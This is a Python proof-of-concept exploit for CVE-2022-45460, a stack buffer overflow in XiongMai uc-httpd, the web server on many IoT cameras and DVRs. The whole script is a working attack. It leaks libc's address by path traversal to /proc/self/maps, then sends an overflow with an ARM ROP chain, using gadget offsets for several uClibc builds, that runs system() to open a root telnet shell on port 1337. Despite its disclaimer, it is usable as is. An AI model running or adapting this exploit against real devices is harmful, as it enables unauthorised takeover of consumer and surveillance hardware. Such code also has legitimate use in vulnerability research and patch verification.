# Exploit Proof of Concept (PoC)
#
# Author: born0monday
# Target: XiongMai uc-httpd
# CVE: CVE-2022-45460 
# Description:  
# This script exploits a stack-based buffer overflow in the URI parsing of uc-http.
# A crafted request overwrites the return address, triggering a ROP chain to achieve RCE.
# 
# Disclaimer:  
# This code is for educational and research purposes only.  
# Use it responsibly and only on systems you have explicit permission to test.

import sys
import socket
from struct import pack

HOST, PORT = sys.argv[1], int(sys.argv[2])

GADGETS = {
    "libc.so.0": {
        0: 0x175CC, # pop {r3, pc}
        1: 0x535E8, # system
        2: 0x368DC, # mov r0, sp; blx r3
    },
    "libuClibc-0.9.32.1.so": {
        0: 0x175CC, # pop {r3, pc}
        1: 0x535E8, # system
        2: 0x368DC, # mov r0, sp; blx r3
    },
    "libuClibc-0.9.33.2.so": {
        0: 0x16C64, # pop {r3, pc}
        1: 0x52A0C, # system
        2: 0x355C8, # mov r0, sp; blx r3
    },
    "libuClibc-0.9.33.3-git.so": {
        0: 0xCA60,  # pop {r3, pc}
        1: 0x547C4, # system
        2: 0x151AC, # mov r0, sp; blx r3
    },
}

CMD = b"busybox telnetd -p 1337 -F -l sh"


def parse_maps(maps):
    for line in maps.split(b"\n"):
        lib = line.split(b"/")[-1].decode()
        if lib in GADGETS.keys() and b"r-xp" in line:
            addr = int(line.split(b"-")[0].decode(), 16)
            print(f"{lib} found at {hex(addr)}")
            return lib, addr
    return None, None


def fetch_maps():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        print(f"connecting to {HOST}:{PORT}")
        sock.connect((HOST, PORT))
    
        sock.send(b"GET /../../../../../proc/self/maps HTTP/1.1\r\n")
        sock.send(b"\r\n\r\n")
        resp = b""
        while True:
            data = sock.recv(2048)
            if not data:
                break
            resp += data
        return resp


def main():
    maps = fetch_maps()
    libc, libc_base = parse_maps(maps)

    payload = b""
    payload += 304 * b"A"
    payload += pack("<I", libc_base + GADGETS[libc][0])
    payload += pack("<I", libc_base + GADGETS[libc][1])
    payload += pack("<I", libc_base + GADGETS[libc][2])

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((HOST, PORT))
        sock.send(b"GET /" + payload + CMD.replace(b" ", b"${IFS}") + b";.mns.cab HTTP/1.1")
        sock.send(b"\r\n\r\n")
    
        print(sock.recv(1024))


if __name__ == "__main__":
    main()